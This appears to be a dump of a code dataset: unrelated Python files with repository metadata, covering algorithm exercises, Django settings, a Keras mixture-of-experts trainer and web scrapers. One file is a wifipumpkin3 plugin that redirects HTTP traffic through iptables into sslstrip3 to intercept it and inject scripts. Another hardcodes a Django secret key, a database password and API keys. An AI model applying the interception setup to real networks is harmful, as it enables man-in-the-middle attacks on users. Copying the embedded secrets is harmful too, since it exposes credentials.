    """Run ``command`` through the shell and return its combined stdout/stderr.

    On a non-zero exit status, writes ``error_template % returncode`` to
    stderr and terminates the process with that status.
    """
    proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
    (out, _) = proc.communicate()
    if proc.returncode:
        # "print >> sys.stderr" is Python-2-only syntax; this form behaves
        # identically on both Python 2 and 3.
        sys.stderr.write((error_template % proc.returncode) + '\n')
        sys.exit(proc.returncode)
    return out
def help():
    """Print command-line usage to stdout.

    NOTE: intentionally shadows the ``help`` builtin; kept to preserve the
    existing call site in main().
    """
    # Parenthesized single-argument print works identically on Python 2 and 3,
    # unlike the original bare print statements (Python-2-only).
    print('usage: %s [option]' % os.path.basename(__file__))
    print('Options:')
    print('--generate-golden: Re-generate golden file')
    print('--dump: Dump the test results to stdout')
def main():
    """Entry point: run the validator over the test files and diff vs golden.

    ``--generate-golden`` rewrites the golden file from the current output,
    ``--dump`` prints the raw validator output, and with no argument the
    output is compared against the stored golden file.
    """
    need_golden = False
    need_dump = False
    if len(sys.argv) > 1:
        if sys.argv[1] == '--generate-golden':
            need_golden = True
        elif sys.argv[1] == '--dump':
            need_dump = True
        else:
            help()
            return
    result = run_and_communicate(validator_command, "Error running validator: %d")
    # Strip absolute paths so the golden file is machine-independent.
    result = result.replace(script_path, "")  # pylint: disable=E1103
    if need_dump:
        # print(...) behaves the same as the former Python-2 print statements
        # for these single-argument calls, and also parses on Python 3.
        print(result)
        return
    if need_golden:
        with open(golden_file, 'wt') as golden:
            golden.write(result)
    else:
        with open(golden_file, 'rt') as golden:
            golden_text = golden.read()
        if golden_text == result:
            print('OK')
        else:
            print('ERROR: Golden output mismatch')
# Script entry point.
if __name__ == '__main__':
    main()
| [
"xElvis89x@gmail.com"
] | xElvis89x@gmail.com |
c006e1eef801f0d6aca2fd0af66ee80890b5f2fd | 9a9d6052f8cf91dd57be9a9b6564290b0fac9e52 | /Algorithm/JUNGOL/1. Language_Coder/반복제어문1/539_반복제어문1_자가진단4.py | 00e86ec0148550177bbba5b7f69cc431292e6dbc | [] | no_license | Gyeong-Yeon/TIL | 596ec6a093eec34a17dad68bcd91fa9dd08690e8 | eb1f43ee0525da93233b70716cd35caab8d82bda | refs/heads/master | 2023-03-31T19:56:30.979062 | 2021-03-28T13:09:27 | 2021-03-28T13:09:27 | 280,307,737 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | input_li = list(map(int,input().split()))
i = 0
sum = 0
cnt = 0
for i in range(len(input_li)):
sum += input_li[i]
cnt += 1
if input_li[i] >= 100:
break
avg = sum / cnt
print(sum)
print("%0.1f" % (avg)) | [
"lky4156@naver.com"
] | lky4156@naver.com |
c2b29c30a1ad0e3e08788fff8ef7b6a2ca24bc5c | 6ab217b675b0d33dec9d8985efc2de314e3a7a28 | /menus/models/menu/__init__.py | a40593ebbc06d8b54c15b200eb232c440c133755 | [] | no_license | nujkram/dream_cream_pastries | 3547928af859ebbb93f8d6ff64d02796d8c61a0c | c6a764f4f2c16191661ee6747dc0daa896eae5ec | refs/heads/master | 2023-06-20T20:20:21.001373 | 2021-07-29T00:55:49 | 2021-07-29T00:55:49 | 375,721,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | from .models import Menu
from .managers import MenuManager
from .admin import MenuAdmin | [
"markjungersaniva@gmail.com"
] | markjungersaniva@gmail.com |
4212810827fc696d2f652d89c4fb5a3ca5b8bcbf | dc222b7713453f4653da00fa8ce7a76d89c51e68 | /python_test/src/templates/crawler_2.py | 92f75f12a72f6a7c9bd5ddda0e469298768b28d1 | [] | no_license | aimeiyan/exercise | d935d48ddab90c55b8b9ac89e821abf117d5f609 | 617261af69db836a649bd4044f97bec7ab3e845d | refs/heads/master | 2020-05-20T11:36:34.698664 | 2014-02-18T11:27:44 | 2014-02-18T11:27:44 | 10,766,847 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 993 | py | __author__ = 'nancy'
from urllib import urlopen
from bs4 import BeautifulSoup
from urlparse import urlparse, urljoin
def get_and_extract_links(url):
html = urlopen(url).read()
soup = BeautifulSoup(html)
hrefs = soup.find_all('a')
urls = []
for a in hrefs:
href = a.get('href')
if href:
href = href.strip()
if href:
u = urljoin(url, href)
urls.append(u)
return urls
def main():
seed = "http://www.baidu.com"
url = seed
to_be_downloaded = [seed]
downloaded = set()
while to_be_downloaded:
url = to_be_downloaded.pop()
print "download", url, "has", len(to_be_downloaded), "urls remaining", "downloaded", len(downloaded)
urls = get_and_extract_links(url)
downloaded.add(url)
for url in urls:
if seed in url and url[:4] == 'http' and url in downloaded:
to_be_downloaded.append(url)
if __name__ == '__main__':
main() | [
"aimeiyan@gmail.com"
] | aimeiyan@gmail.com |
9bf1c1a1ea823c79a6bf67c90744c7510431225d | 304033f60097c489cbc60aab639be45ccdbef1a5 | /algorithms/boj/brute_force/10819.py | c441a9bdf62e955e7f1408980bc52b89a3bffe5c | [] | no_license | pgw928/TIL | 3d0c47c07bd1f5c73826daf8579a2b0e3f93cb95 | 765906f1e6eecad4ad8ec9bf704041433d7eb304 | refs/heads/master | 2023-06-29T05:46:30.039815 | 2021-08-10T17:38:11 | 2021-08-10T17:38:11 | 288,923,095 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | import sys
from itertools import permutations
input = sys.stdin.readline
N = int(input())
A = list(map(int, input().split()))
M = 0
for perm in permutations(A):
tmp = [ abs(perm[i+1]-perm[i]) for i in range(len(perm)-1)]
M = max(sum(tmp), M)
print(M)
| [
"pku928@naver.com"
] | pku928@naver.com |
c5ee9bd2b4b5e9e1dff46626f83b49a5ac8d4516 | 95e9ec4b3b0d86063da53a0e62e138cf794cce3a | /webroot/py1902/py1902/settings.py | b7b4e02bf8a11be11851ad956f67c31f2b3fafe1 | [] | no_license | wjl626nice/1902 | c3d350d91925a01628c9402cbceb32ebf812e43c | 5a1a6dd59cdd903563389fa7c73a283e8657d731 | refs/heads/master | 2023-01-05T23:51:47.667675 | 2019-08-19T06:42:09 | 2019-08-19T06:42:09 | 180,686,044 | 4 | 1 | null | 2023-01-04T07:35:24 | 2019-04-11T00:46:43 | Python | UTF-8 | Python | false | false | 5,392 | py | """
Django settings for py1902 project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*!b8$5*w^zcz$m@875#i(u2!21k9zz9=$j_s4zhfbw*2ypeh+f'
# SECURITY WARNING: don't run with debug turned on in production!
# 开发阶段 开启调试模式
DEBUG = True
# 设置允许请求的主机
ALLOWED_HOSTS = ['127.0.0.1', 'www.xuxin.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'manager.apps.ManagerConfig',
'Home.apps.HomeConfig',
'api.apps.ApiConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'CheckLoginMW.CheckLoginMW'
]
ROOT_URLCONF = 'py1902.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
# 模板引擎初始化参数,在模板中可以直接使用。
'conf.global.auto_config'
],
},
},
]
WSGI_APPLICATION = 'py1902.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'p1_blog',
'HOST': '127.0.0.1',
'USER': 'root',
'PASSWORD': '123456',
'PORT': '3306'
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# 盐
SALT = 'qwsa12#'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
# 媒体文件路径 别名
MEDIA_URL = '/uploads/'
# 指定媒体文件路径
# MEDIA_ROOT = os.path.join(BASE_DIR, 'uploads'),
# 后台菜单
MENU = [
{"id": "menu-article", "title": "文章管理", "url": '#', "icon": '', 'child': [
{"title": "栏目管理", "url": '/admin/category/'},
{"title": "文章列表", "url": '/admin/article/'}
]
},
{"id": "menu-picture", "title": "随手拍管理", "url": '#', "icon": '', 'child': [
{"title": "图片管理", "url": '#'},
]
},
{"id": "menu-banner", "title": "轮播图管理", "url": '#', "icon": '', 'child': [
{"title": "轮播图", "url": '#'},
]
},
{"id": "menu-comments", "title": "评论管理", "url": '#', "icon": '', 'child': [
{"title": "评论列表", "url": '#'}
]
},
{"id": "menu-system", "title": "系统管理", "url": '#', "icon": '', 'child': [
{"title": "系统设置", "url": '#'},
{"title": "管理员管理", "url": '/admin/manager/'},
{"title": "友情链接管理", "url": '/admin/links/'},
{"title": "留言管理", "url": '#'},
{"title": "屏蔽词", "url": '#'},
{"title": "操作日志", "url": '#'},
]
},
]
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
},
},
'loggers': {
'django': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
},
}
# 极验id和key
GEETEST = {
'id': '4726b9849ea9f2493787a3fa247a9973',
'key': 'c264c310dbae53a1383770771408b473',
} | [
"18537160262@qq.com"
] | 18537160262@qq.com |
305dcded8a50a6e919ea59991bcdf5aeada117a3 | da1e8e6d9886cabe65887a5e2cfe3fe62c06a564 | /lab1/venv/bin/easy_install | ea69e4a6d164aa9262f47ff5cb644ba718f88864 | [] | no_license | serhiisad/Numerical_Analysis | d0f1a5ae652bf57354f472d3f239f23d4aae2a86 | acdc38d712011fdddc4bbb0aa6712d18745fdfc8 | refs/heads/master | 2020-04-16T04:49:08.128479 | 2019-01-11T17:29:16 | 2019-01-11T17:29:16 | 165,282,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | #!/home/serhiisad/PycharmProjects/LABS_Numerical_Analysis_Onai/lab1/venv/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"serhiisad.kpi@gmail.com"
] | serhiisad.kpi@gmail.com | |
fefea20dda2cfe7903db5639fa9a63fd997584d3 | 182fe181687327d933aefa1b9f8779d7643430e4 | /code/cifar/gater_seq_prime_lenet.py | e37bed55693ae74138f39f9e137c53dfc848c28c | [
"MIT"
] | permissive | IDPSGitHubProjects/MixtureOfExperts | 503a399f32b78def4121fc73c892960144abb713 | ec43e312b3b3abddf0bd7281535842e73268b771 | refs/heads/master | 2022-11-01T15:26:39.765629 | 2020-06-16T12:45:01 | 2020-06-16T12:45:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,250 | py | #!/usr/bin/env python3
# TODO:
# Train Data
import sys
sys.path.append('../helper_utils')
sys.path.append('/home/kkalyan3/code/helper_utils')
from utils import load_array, eval_target
from nn_arch import nn_models
from keras.utils import np_utils
import numpy as np
import logging
import time
from keras.layers import Dense, Input, Dropout, Lambda
from keras.models import Model
from keras import backend as K
from helper_callbacks import CustomCallback
PATH = '/home/kkalyan3/data/cifar10/'
#PATH = '../../data/cifar10/'
class MOE(object):
    """Mixture-of-experts trainer for CIFAR-10 using LeNet-style Keras experts.

    ``main`` first trains a "prime" network, then alternates for ``iters``
    rounds between (a) partitioning the training set across experts --
    randomly in round 0, afterwards by the gater's learned expert weights --
    (b) training one expert per partition, and (c) training a gating network
    that mixes the experts' class probabilities.
    """

    def __init__(self):
        self.experts = None       # number of expert networks
        self.train_dim = None     # shape tuple of the training data
        self.test_dim = None      # shape tuple of the test data
        self.expert_dim = None
        self.iters = 4            # expert/gater alternation rounds
        self.target = 10          # number of output classes
        self.wm_xi = None         # gater expert-weight matrix from last round
        self.c = 1                # slack added to per-expert capacity in get_expert
        self.early_stopping = CustomCallback()
        self.warn_log = [["Iter", "Expert Training Error", "Expert Val Error"]]

    def get_random(self):
        """Randomly assign every training index to one expert.

        Returns a dict mapping expert id -> list of sample indices.
        """
        local_expert = {}
        random_bucket = np.random.choice(self.experts, self.train_dim[0])
        for i, e in enumerate(random_bucket):
            if e not in local_expert:
                local_expert[e] = [i]
            else:
                local_expert[e].append(i)
        return local_expert

    def model_train(self, X, y, X_val, y_val, i):
        """Train one expert on its partition and log train/val error for round ``i``."""
        model = nn_models()
        model.ip_shape = X.shape
        model = model.lenet5()
        model.fit(X, y, batch_size=256, epochs=500, validation_data=(X_val, y_val),
                  verbose=1, callbacks=[self.early_stopping])
        yhat_train = model.predict(X, batch_size=256)
        # BUG FIX: previously this predicted on the module-level global
        # ``x_val`` instead of the ``X_val`` argument passed by the caller.
        yhat_val = model.predict(X_val, batch_size=256)
        train_error = eval_target(yhat_train, y)
        val_error = eval_target(yhat_val, y_val)
        self.warn_log.append([i, train_error, val_error])
        return model

    def tensor_product(self, x):
        """Mix expert predictions with gater weights, per batch element.

        ``x`` is [gater_weights (batch, experts), stacked_yhats
        (batch, experts * target)]; returns a (batch, target) tensor.
        """
        a = x[0]
        b = x[1]
        b = K.reshape(b, (-1, self.experts, self.target))
        y = K.batch_dot(b, a, axes=1)
        return y

    def gater(self):
        """Build the gating network over prime features + stacked expert outputs."""
        dim_inputs_data = Input(shape=(64, ))
        dim_mlp_yhat = Input(shape=(self.target * self.experts,))
        layer_2 = Dense(150, activation='relu')(dim_inputs_data)
        layer_2_b = Dropout(0.5)(layer_2)
        # 'layer_op' exposes the per-expert weights used for re-partitioning.
        layer_3 = Dense(self.experts, name='layer_op', activation='relu', use_bias=False)(layer_2_b)
        layer_4 = Lambda(self.tensor_product)([layer_3, dim_mlp_yhat])
        layer_4b = Dropout(0.5)(layer_4)
        layer_10 = Dense(10, activation='softmax')(layer_4b)
        model = Model(inputs=[dim_inputs_data, dim_mlp_yhat], outputs=layer_10)
        model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
        return model

    def bucket_function(self, i):
        """Round 0 partitions randomly; later rounds follow the gater weights."""
        if i == 0:
            return self.get_random()
        else:
            return self.get_expert(self.wm_xi)

    def get_expert(self, weight_data):
        """Greedy capacity-limited assignment of samples to experts.

        Each sample goes to its highest-weight expert that still has room;
        capacity is n_samples / n_experts plus the slack ``self.c``.
        """
        thresh_hard = int(weight_data.shape[0] / weight_data.shape[1]) + self.c
        # e.g. weights [0.2, 0.1, 0.7, 0.1] -> preference order [2, 0, 1, 3]
        sort_index = np.argsort(-1 * weight_data)
        thresh_dict = {}
        thresh_dict = thresh_dict.fromkeys(list(range(weight_data.shape[1])), 0)
        local_expert = {}
        for k, v in enumerate(sort_index):
            for i in v:
                if thresh_dict[i] < thresh_hard:
                    thresh_dict[i] += 1
                    if i not in local_expert:
                        local_expert[i] = [k]
                    else:
                        local_expert[i].append(k)
                    break
        return local_expert

    def main(self, x_train, y_train, x_test, y_test, x_val, y_val):
        """Full training loop: prime network, then ``iters`` expert/gater rounds."""
        model_prime = nn_models()
        model_prime.ip_shape = x_train.shape
        model_p = model_prime.lenet5()
        model_p.fit(x_train, y_train, batch_size=256, epochs=500, validation_data=(x_val, y_val),
                    verbose=1, callbacks=[self.early_stopping])
        # Feature extractor: the prime network truncated at its 'dense2' layer.
        model_prime = Model(inputs=model_p.input,
                            outputs=model_p.get_layer('dense2').output)
        prime_op_tr = model_prime.predict(x_train)
        prime_op_tt = model_prime.predict(x_test)
        prime_op_v = model_prime.predict(x_val)
        prime_op_train = model_p.predict(x_train)
        prime_op_val = model_p.predict(x_val)
        tre = eval_target(prime_op_train, y_train)
        vale = eval_target(prime_op_val, y_val)
        self.warn_log.append([-1, tre, vale])
        for i in range(self.iters):
            split_buckets = self.bucket_function(i)
            yhat_train_exp = []
            yhats_test_exp = []
            yhats_val_exp = []
            for expert_index in sorted(split_buckets):
                y = y_train[split_buckets[expert_index]]
                X = x_train[split_buckets[expert_index]]
                model = self.model_train(X, y, x_val, y_val, i)
                yhat_train = model.predict(x_train, batch_size=256)
                yhats_test = model.predict(x_test, batch_size=256)
                yhats_val = model.predict(x_val, batch_size=256)
                yhat_train_exp.append(yhat_train)
                yhats_test_exp.append(yhats_test)
                yhats_val_exp.append(yhats_val)
                print("Expert Index {}".format(expert_index))
            # Stack every expert's class probabilities side by side.
            yhat_tr = np.hstack(yhat_train_exp)
            yhat_tt = np.hstack(yhats_test_exp)
            yhat_val = np.hstack(yhats_val_exp)
            model = self.gater()
            history = model.fit([prime_op_tr, yhat_tr], y_train, shuffle=True,
                                batch_size=256, verbose=1,
                                validation_data=([prime_op_v, yhat_val], y_val),
                                epochs=500, callbacks=[self.early_stopping])
            yhats_train = model.predict([prime_op_tr, yhat_tr], batch_size=256)
            yhats_test = model.predict([prime_op_tt, yhat_tt], batch_size=256)
            yhats_val = model.predict([prime_op_v, yhat_val], batch_size=256)
            tre = eval_target(yhats_train, y_train)
            tte = eval_target(yhats_test, y_test)
            vale = eval_target(yhats_val, y_val)
            logging.info('{}, {}, {}, {}'.format(i, tre, vale, tte))
            # Read back the gater's expert weights to drive the next partition.
            expert_units = Model(inputs=model.input,
                                 outputs=model.get_layer('layer_op').output)
            self.wm_xi = expert_units.predict([prime_op_tr, yhat_tr])
        return "Gater Training Complete"
if __name__ == '__main__':
    start_time = time.time()
    # One log file per run, suffixed with the start timestamp.
    logging.basicConfig(filename='../log/cifair_gater_simple_prime_lenet'+str(start_time), level=logging.INFO)
    logging.info('##### NEW EXPERIMENT_' + str(start_time) + '_#####')
    TRAIN = PATH + 'train/400/'
    TEST = PATH + 'test/400/'
    VAL = PATH + 'val/400/'
    # Load the pre-saved bcolz arrays for each split.
    x_train = load_array(TRAIN + 'x_train.bc/')
    y_train = load_array(TRAIN + 'y_train.bc/')
    x_test = load_array(TEST + 'x_test.bc/')
    y_test = load_array(TEST + 'y_test.bc/')
    x_val = load_array(VAL + 'x_val.bc/')
    y_val = load_array(VAL + 'y_val.bc/')
    # One-hot encode the 10 CIFAR-10 classes.
    y_train = np_utils.to_categorical(y_train, 10)
    y_test = np_utils.to_categorical(y_test, 10)
    y_val = np_utils.to_categorical(y_val, 10)
    # Scale pixels to [0, 1] ...
    x_train = x_train.astype('float32')
    x_test = x_test.astype('float32')
    x_val = x_val.astype('float32')
    x_train /= 255
    x_test /= 255
    x_val /= 255
    # ... and center every split on the training-set mean image.
    mean_image = np.mean(x_train, axis=0)
    x_train -= mean_image
    x_test -= mean_image
    x_val -= mean_image
    # Pre process end
    uniform = MOE()
    uniform.experts = 10
    uniform.train_dim = x_train.shape
    uniform.test_dim = x_test.shape
    logging.info("Experts " + str(uniform.experts))
    logging.info("Train " + str(x_train.shape))
    logging.info("Val " + str(x_val.shape))
    logging.info("Test " + str(x_test.shape))
    logging.info('{}, {}, {}, {}'.format("Iter", "Training Error", "Val Error", "Test Error"))
    uniform.main(x_train, y_train, x_test, y_test, x_val, y_val)
    total_time = (time.time() - start_time)/60
    logging.info("Total Time " + str(total_time))
    # Dump the per-expert train/val error table collected during training.
    for i in uniform.warn_log:
        logging.warning(i)
    logging.info("#### Experiment Complete ####")
| [
"krishnakalyan3@gmail.com"
] | krishnakalyan3@gmail.com |
687250aac92bf01376a32104c14b0ea2953ebf56 | 410de43884e51d1edef0bb31035d6e78e3f0f3c0 | /wifipumpkin3/core/servers/proxy/pumpkin_proxy.py | ddf931d79053fac9d7daf8e3bd2b29f2052275af | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | tirkarthi/wifipumpkin3 | 7af13f4f5c7908e555660f4a29b71d245174daa7 | 809baef0c8116410a26f6b263a457f0a1d7f98b9 | refs/heads/master | 2022-12-07T05:25:18.270403 | 2020-08-02T02:04:11 | 2020-08-02T02:04:11 | 291,266,640 | 0 | 0 | Apache-2.0 | 2020-08-29T12:25:13 | 2020-08-29T12:25:12 | null | UTF-8 | Python | false | false | 5,494 | py | from wifipumpkin3.core.config.globalimport import *
from collections import OrderedDict
from functools import partial
from threading import Thread
import queue
from scapy.all import *
import logging, os
import wifipumpkin3.core.utility.constants as C
from wifipumpkin3.core.servers.proxy.proxymode import *
from wifipumpkin3.core.utility.collection import SettingsINI
from wifipumpkin3.core.common.uimodel import *
from wifipumpkin3.core.widgets.docks.dock import DockableWidget
# This file is part of the wifipumpkin3 Open Source Project.
# wifipumpkin3 is licensed under the Apache 2.0.
# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class TCPProxyDock(DockableWidget):
    """Dockable widget that accumulates per-plugin log lines from the TCP proxy."""

    id = "TCPProxy"
    title = "TCPProxy"

    def __init__(self, parent=0, title="", info={}):
        # NOTE(review): ``info`` is accepted but an empty dict is forwarded to
        # the base class; confirm whether the argument should be passed through.
        super(TCPProxyDock, self).__init__(parent, title, info={})
        self.setObjectName(self.title)
        self.THeaders = OrderedDict([("Plugin", []), ("Logging", [])])

    def writeModeData(self, data):
        """Append a single ``{plugin_name: log_line}`` entry to the table data."""
        # BUG FIX: dict.keys() is a non-subscriptable view on Python 3, so
        # ``data.keys()[0]`` raised TypeError. Take the first key directly.
        plugin_name = next(iter(data))
        self.THeaders["Plugin"].append(plugin_name)
        self.THeaders["Logging"].append(data[plugin_name])
        print(data)

    def stopProcess(self):
        """No-op hook kept for interface compatibility with other docks."""
        pass
class PumpKinProxy(ProxyMode):
    """Proxy plugin that runs sslstrip3 as WiFi-Pumpkin's "Pumpkin-Proxy".

    Installs an iptables rule redirecting port-80 traffic to the configured
    proxy port and relays the subprocess output into the application logger.
    """

    # Metadata consumed by the plugin framework / UI.
    Name = "PumpkinProxy 3"
    Author = "Pumpkin-Dev"
    ID = "pumpkinproxy"
    Description = "Transparent proxies that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited."
    Hidden = False
    LogFile = C.LOG_PUMPKINPROXY
    CONFIGINI_PATH = C.CONFIG_PP_INI
    _cmd_array = []
    ModSettings = True
    RunningPort = 8080
    ModType = "proxy"
    TypePlugin = 1

    def __init__(self, parent=None, **kwargs):
        """Register the plugin and read its listening port from the INI config."""
        super(PumpKinProxy, self).__init__(parent)
        self.setID(self.ID)
        self.parent = parent
        self.setTypePlugin(self.TypePlugin)
        self.setRunningPort(self.conf.get("proxy_plugins", "pumpkinproxy_config_port"))

    def Initialize(self):
        """Install the iptables REDIRECT of HTTP traffic to the proxy port."""
        self.add_default_rules(
            "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}".format(
                self.conf.get("proxy_plugins", "pumpkinproxy_config_port")
            )
        )
        self.runDefaultRules()

    @property
    def CMD_ARRAY(self):
        """Command-line arguments for the sslstrip3 subprocess (rebuilt per read)."""
        port_ssltrip = self.conf.get("proxy_plugins", "pumpkinproxy_config_port")
        self._cmd_array = ["-l", port_ssltrip]
        return self._cmd_array

    def boot(self):
        """Create the sslstrip3 process thread and wire its output to LogOutput."""
        self.reactor = ProcessThread({"sslstrip3": self.CMD_ARRAY})
        self.reactor._ProcssOutput.connect(self.LogOutput)
        self.reactor.setObjectName(self.ID)

    @property
    def getPlugins(self):
        """List console command names: pumpkinproxy.<plugin>[.<sub_option>]."""
        commands = self.config.get_all_childname("plugins")
        list_commands = []
        for command in commands:
            list_commands.append(self.ID + "." + command)
            # find all plugin from pumpkinproxy
            for sub_plugin in self.config.get_all_childname("set_{}".format(command)):
                list_commands.append("{}.{}.{}".format(self.ID, command, sub_plugin))
        return list_commands

    def LogOutput(self, data):
        """Forward subprocess output to the logger while the access point is up."""
        if self.conf.get("accesspoint", "status_ap", format=bool):
            self.logger.info(data)

    def parser_set_pumpkinproxy(self, status, plugin_name):
        """Handle ``set`` console commands that toggle plugins or their options.

        Two dotted forms are accepted:
        - ``pumpkinproxy.<plugin>``              -> toggles the plugin itself
        - ``pumpkinproxy.<plugin>.<sub_option>`` -> sets one plugin option
        """
        if len(plugin_name.split(".")) == 2:
            try:
                # plugin_name = pumpkinproxy.no-cache
                name_plugin, key_plugin = (
                    plugin_name.split(".")[0],
                    plugin_name.split(".")[1],
                )
                if key_plugin in self.config.get_all_childname("plugins"):
                    self.config.set("plugins", key_plugin, status)
                else:
                    print(
                        display_messages(
                            "unknown plugin: {}".format(key_plugin), error=True
                        )
                    )
            except IndexError:
                print(display_messages("unknown sintax command", error=True))
        elif len(plugin_name.split(".")) == 3:
            try:
                # plugin_name = pumpkinproxy.beef.url_hook
                name_plugin, key_plugin = (
                    plugin_name.split(".")[1],
                    plugin_name.split(".")[2],
                )
                if key_plugin in self.config.get_all_childname(
                    "set_{}".format(name_plugin)
                ):
                    self.config.set("set_{}".format(name_plugin), key_plugin, status)
                else:
                    print(
                        display_messages(
                            "unknown plugin: {}".format(key_plugin), error=True
                        )
                    )
            except IndexError:
                print(display_messages("unknown sintax command", error=True))
| [
"mh4root@gmail.com"
] | mh4root@gmail.com |
fa56efff49eee1254f0c1da3bae2a1b0d65471aa | edbabcc3a43a46f83c656f82248f757387629c32 | /weibo_spider/douban.py | 4a8c7e13b96eb2cbc76cbd7f78d9e35f14fc4158 | [] | no_license | INJNainggolan/Pycharm_work | b84fd8b4cd5158161956c96da326e3f0eba6b2eb | 8314aa23ade681cbad9e7abb4d35de508d46482b | refs/heads/master | 2020-04-08T03:30:35.177056 | 2018-03-07T13:15:09 | 2018-03-07T13:15:09 | 124,235,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,547 | py | #coding:utf-8
__author__ = 'hang'
import warnings
warnings.filterwarnings("ignore")
import jieba #分词包
import numpy #numpy计算包
import codecs #codecs提供的open方法来指定打开的文件的语言编码,它会在读取的时候自动转换为内部unicode
import re
import pandas as pd
import matplotlib.pyplot as plt
from urllib import request
from bs4 import BeautifulSoup as bs
#%matplotlib inline
import matplotlib
matplotlib.rcParams['figure.figsize'] = (10.0, 5.0)
from wordcloud import WordCloud#词云包
#分析网页函数
def getNowPlayingMovie_list():
    """Scrape douban's now-playing page for Hangzhou.

    Returns a list of dicts, one per movie, with keys ``id`` (douban
    subject id) and ``name`` (taken from the poster image's alt text).
    """
    resp = request.urlopen('https://movie.douban.com/nowplaying/hangzhou/')
    page = resp.read().decode('utf-8')
    soup = bs(page, 'html.parser')
    container = soup.find_all('div', id='nowplaying')[0]
    movies = []
    for item in container.find_all('li', class_='list-item'):
        entry = {'id': item['data-subject']}
        # If several <img> tags exist the last one's alt wins, as before.
        for img in item.find_all('img'):
            entry['name'] = img['alt']
        movies.append(entry)
    return movies
#爬取评论函数
def getCommentsById(movieId, pageNum):
    """Fetch one page (20 items) of douban short comments for *movieId*.

    Parameters
    ----------
    movieId : str
        Douban subject id.
    pageNum : int
        1-based page number.

    Returns
    -------
    list of str, or ``False`` when *pageNum* is not positive (kept for
    backward compatibility with callers that test the falsy return).
    """
    eachCommentList = []
    if pageNum > 0:
        start = (pageNum - 1) * 20
    else:
        return False
    requrl = 'https://movie.douban.com/subject/' + movieId + '/comments' + '?' + 'start=' + str(start) + '&limit=20'
    print(requrl)
    resp = request.urlopen(requrl)
    html_data = resp.read().decode('utf-8')
    soup = bs(html_data, 'html.parser')
    for item in soup.find_all('div', class_='comment'):
        # Bug fix: guard against comment blocks without a <p> tag; the
        # original `item.find_all('p')[0]` raised IndexError on such markup.
        paragraphs = item.find_all('p')
        if paragraphs and paragraphs[0].string is not None:
            eachCommentList.append(paragraphs[0].string)
    return eachCommentList
def main():
    """Crawl comments for the first now-playing movie and render a word cloud."""
    # Fetch the first 10 pages of comments for the first now-playing movie.
    commentList = []
    NowPlayingMovie_list = getNowPlayingMovie_list()
    for i in range(10):
        num = i + 1
        commentList_temp = getCommentsById(NowPlayingMovie_list[0]['id'], num)
        commentList.append(commentList_temp)
    # Flatten the per-page lists into one big string.
    comments = ''
